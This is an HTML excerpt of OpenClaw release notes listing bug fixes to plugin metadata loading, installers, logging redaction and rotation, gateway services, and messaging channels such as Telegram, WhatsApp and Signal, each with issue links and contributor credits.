<li>Plugins/channels: keep native command and native skill <code>auto</code> defaults on static channel metadata so config, audit, and command-list checks do not load channel runtime just to read those defaults. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/channels: keep channel remove selection and all-channel capabilities summaries on read-only plugin metadata, loading channel runtime only for the selected mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep Provider Index preview rows out of <code>models list --all --provider &lt;id&gt;</code> when the owning provider plugin is disabled, preserving config authority for cold catalog fallbacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/model runs: keep <code>openclaw infer model run</code> on explicit OpenRouter models from loading the full provider catalog or inheriting chat-agent silent-reply policy, restoring non-empty one-shot probe output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289787526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68791/hovercard" href="https://github.com/openclaw/openclaw/issues/68791">#68791</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/limpredator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/limpredator">@limpredator</a>.</li>
<li>Installer/macOS: rerun Homebrew install steps without the gum spinner when raw-mode ioctl failures occur, and avoid claiming <code>node@24</code> was installed when the Homebrew keg binary is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dad-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dad-io">@dad-io</a>.</li>
<li>Installer: load nvm before Node.js detection so <code>curl | bash</code> installs respect nvm-managed Node instead of stale system Node. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093236636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49556/hovercard" href="https://github.com/openclaw/openclaw/issues/49556">#49556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heavenlxj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heavenlxj">@heavenlxj</a>.</li>
<li>Installer/Windows: route PowerShell install failures through a top-level handler so <code>iwr ... | iex</code> returns control to the current shell while direct script-file runs still exit non-zero. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034858716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38054/hovercard" href="https://github.com/openclaw/openclaw/issues/38054">#38054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PwrSrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PwrSrg">@PwrSrg</a>.</li>
<li>CLI/Volta: respawn raw <code>openclaw</code> CLI runs through the named <code>node</code> shim when the current Node executable resolves to <code>volta-shim</code>, avoiding direct shim execution failures in non-interactive shells. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288940390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68672" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68672/hovercard" href="https://github.com/openclaw/openclaw/issues/68672">#68672</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezm86/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezm86">@sanchezm86</a>.</li>
<li>Installer: warn when multiple npm global roots contain OpenClaw installs, showing active Node/npm/openclaw plus each install path and version so stale version-manager installs are visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044590366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40839/hovercard" href="https://github.com/openclaw/openclaw/issues/40839">#40839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhixianio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhixianio">@zhixianio</a>.</li>
<li>Cron/tasks: recover completed cron task ledger records from durable run logs and job state before marking them <code>lost</code>, reducing false <code>backing session missing</code> audit errors for isolated cron runs and keeping offline CLI audit from treating its empty local cron active-job set as authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330026583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71963/hovercard" href="https://github.com/openclaw/openclaw/issues/71963">#71963</a>.</li>
<li>Docker: copy patched dependency files into runtime images so downstream <code>pnpm install</code> layers keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
<li>Package: include patched dependency files in the published npm package so downstream installs can resolve <code>patchedDependencies</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: treat malformed bundled channel plugin loaders that return <code>undefined</code> as unavailable instead of crashing config and help paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291595561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69044/hovercard" href="https://github.com/openclaw/openclaw/issues/69044">#69044</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhli843/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhli843">@frankhli843</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Scripts/watch: show corrupted dependency package-config recovery guidance when <code>gateway:watch</code> fails during watcher startup, without double-logging unrelated import failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184421615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58780/hovercard" href="https://github.com/openclaw/openclaw/pull/58780">#58780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roytong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roytong9">@roytong9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Signal: read signal-cli RPC, health checks, and SSE events through Node's HTTP client so Node 24/25 fetch regressions do not break Signal sends or inbound events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112941905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51716/hovercard" href="https://github.com/openclaw/openclaw/issues/51716">#51716</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4122411587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53040/hovercard" href="https://github.com/openclaw/openclaw/issues/53040">#53040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Barukimang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Barukimang">@Barukimang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Skills/Docker: run npm-backed skill dependency installs with an OpenClaw-managed user prefix so non-root Docker images do not write to <code>/usr/local</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193497158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59601/hovercard" href="https://github.com/openclaw/openclaw/issues/59601">#59601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chanjarster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chanjarster">@chanjarster</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/runtime: submit heartbeat, cron, and exec wakeups as transient runtime context instead of visible user prompts, keeping synthetic system work out of chat transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261476582" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66496/hovercard" href="https://github.com/openclaw/openclaw/issues/66496">#66496</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264783156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66814" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66814/hovercard" href="https://github.com/openclaw/openclaw/issues/66814">#66814</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeades/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeades">@jeades</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandomaker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandomaker">@mandomaker</a>.</li>
<li>Telegram: include native quote excerpts automatically for threaded replies and reply tags when the original Telegram text is available, without adding another config knob. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3884461774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6975/hovercard" href="https://github.com/openclaw/openclaw/issues/6975">#6975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex05ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex05ai">@rex05ai</a>.</li>
<li>Node/Linux: make <code>openclaw node install</code> enable and restart the <code>openclaw-node</code> systemd unit instead of the gateway unit on node-only VMs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285532256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68287/hovercard" href="https://github.com/openclaw/openclaw/issues/68287">#68287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlebee-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlebee-agent">@dlebee-agent</a>.</li>
<li>Browser/CDP: retry transient raw-CDP WebSocket handshake failures before any browser command is sent, and reconnect stale persistent Playwright CDP sessions for safe tab-list reads without replaying mutating browser actions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276826431" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67728" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67728/hovercard" href="https://github.com/openclaw/openclaw/issues/67728">#67728</a>.</li>
<li>Gateway/Linux: retry <code>systemctl --user enable</code> after a second daemon reload when the freshly written gateway unit is not visible yet on migrated systemd installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246585581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65184" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65184/hovercard" href="https://github.com/openclaw/openclaw/issues/65184">#65184</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liushuaiiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liushuaiiu">@liushuaiiu</a>.</li>
<li>Telegram: preserve exact selected quote text when sending native quote replies, and retry with legacy replies if Telegram rejects quote parameters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330007852" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71952/hovercard" href="https://github.com/openclaw/openclaw/pull/71952">#71952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Plugins/CLI: preserve manifest name, description, format, and source metadata in cold <code>openclaw plugins list</code> output without importing plugin runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Security/audit: read channel exposure and plugin allowlist ownership from read-only plugin index metadata so cold audits do not depend on loaded channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/chat: keep <code>/plugins list</code>, <code>/plugins enable</code>, and <code>/plugins disable</code> on the persisted plugin index path so chat plugin management does not load diagnostic/runtime plugin registries before execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: read workspace plugin status and legacy web-search ownership through installed-index manifest metadata instead of broad manifest registry scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/agents: read channel provider status from read-only plugin index metadata for text <code>agents list</code> output instead of the loaded channel registry. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Logging: redact configured secret patterns at console and file-log sink exits so credentials that reach the logger are masked before terminal display or JSONL persistence. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279976745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67953" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67953/hovercard" href="https://github.com/openclaw/openclaw/issues/67953">#67953</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ziy1-Tan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ziy1-Tan">@Ziy1-Tan</a>.</li>
<li>Gateway/services: refuse process and service mutations from an older OpenClaw binary when the config was last written by a newer version, preventing split-brain installs from stopping or rewriting newer gateway services. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164454666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57079" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57079/hovercard" href="https://github.com/openclaw/openclaw/issues/57079">#57079</a>.</li>
<li>Gateway: reserve <code>/healthz</code> and <code>/readyz</code> ahead of plugin, canvas, and Control UI HTTP stages so liveness/readiness probes still answer when a later route handler stalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301852326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69674" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69674/hovercard" href="https://github.com/openclaw/openclaw/issues/69674">#69674</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xike-Creek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xike-Creek">@Xike-Creek</a>.</li>
<li>Logging: load <code>logging.file</code> and redaction settings directly from the active OpenClaw config path in bundled runtimes, so packaged gateways stop falling back to <code>/tmp/openclaw</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191142978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59370" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59370/hovercard" href="https://github.com/openclaw/openclaw/issues/59370">#59370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268830246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67168/hovercard" href="https://github.com/openclaw/openclaw/issues/67168">#67168</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207216477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61295/hovercard" href="https://github.com/openclaw/openclaw/issues/61295">#61295</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeaneYan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeaneYan">@KeaneYan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pan9hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pan9hu">@Pan9hu</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zsjlovelike/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zsjlovelike">@zsjlovelike</a>.</li>
<li>Logging: rotate file logs at <code>logging.maxFileBytes</code>, keep bounded numbered archives, and make long-lived rolling loggers follow the current-day file instead of suppressing diagnostics or writing stale dated files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182641485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58583/hovercard" href="https://github.com/openclaw/openclaw/issues/58583">#58583</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216327509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62381/hovercard" href="https://github.com/openclaw/openclaw/issues/62381">#62381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpeghead/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpeghead">@jpeghead</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhaoleink/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhaoleink">@zhaoleink</a>.</li>
<li>Agents/groups: treat clean empty assistant stops as silent <code>NO_REPLY</code> only for always-on groups where silent replies are allowed, while keeping direct and mention-gated sessions on the incomplete-turn retry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>macOS/Node: keep native remote app nodes from advertising <code>browser.proxy</code>, start browser-capable CLI node services through the restored <code>openclaw node start</code> command, and show an actionable browser-control error when the local control service is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263105927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66637/hovercard" href="https://github.com/openclaw/openclaw/issues/66637">#66637</a>.</li>
<li>Gateway/update: fail package updates when the restarted managed gateway reports the wrong version, including fallback restarts and JSON mode, avoiding false-success mixed-version restarts after macOS LaunchAgent updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Gateway/update: warn before package updates and bundled plugin runtime-dependency repairs when the target volume appears low on disk space, without blocking installs on best-effort filesystem checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Plugins/runtime deps: surface activated plugin load failures in health and fail package-update restart verification or doctor repair when bundled runtime deps still cannot load, avoiding false-success repairs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Gateway/Linux: include fnm <code>aliases/default/bin</code> in generated service PATHs and let doctor accept either modern fnm aliases or the legacy <code>current/bin</code> symlink, avoiding false PATH repair prompts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283558641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68169" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68169/hovercard" href="https://github.com/openclaw/openclaw/issues/68169">#68169</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richard-scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richard-scott">@richard-scott</a>.</li>
<li>Installer/Linux: run apt installs with noninteractive dpkg and needrestart settings so fresh Ubuntu 24.04 <code>curl | bash</code> installs do not hang while installing Node.js, Git, or build tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046027578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41146" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41146/hovercard" href="https://github.com/openclaw/openclaw/issues/41146">#41146</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iht76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iht76">@iht76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexcarv318/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexcarv318">@alexcarv318</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cs3gallery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cs3gallery">@cs3gallery</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/firofame/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firofame">@firofame</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>.</li>
<li>Providers/Bedrock: defer the AWS SDK import until Bedrock discovery actually runs so plugin registration and setup stay lightweight on cold start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328833605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71690/hovercard" href="https://github.com/openclaw/openclaw/issues/71690">#71690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-ai-gregmoser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-ai-gregmoser">@jarvis-ai-gregmoser</a>.</li>
<li>Installer/macOS: stop immediately when Homebrew <code>node@24</code> installation fails and avoid printing PATH advice for missing Homebrew Node installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a>.</li>
<li>WhatsApp: remove ack reactions after a visible reply when <code>messages.removeAckAfterReply</code> is enabled, matching other reaction-capable channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3987412583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26183" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26183/hovercard" href="https://github.com/openclaw/openclaw/issues/26183">#26183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrUnforsaken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrUnforsaken">@MrUnforsaken</a>.</li>
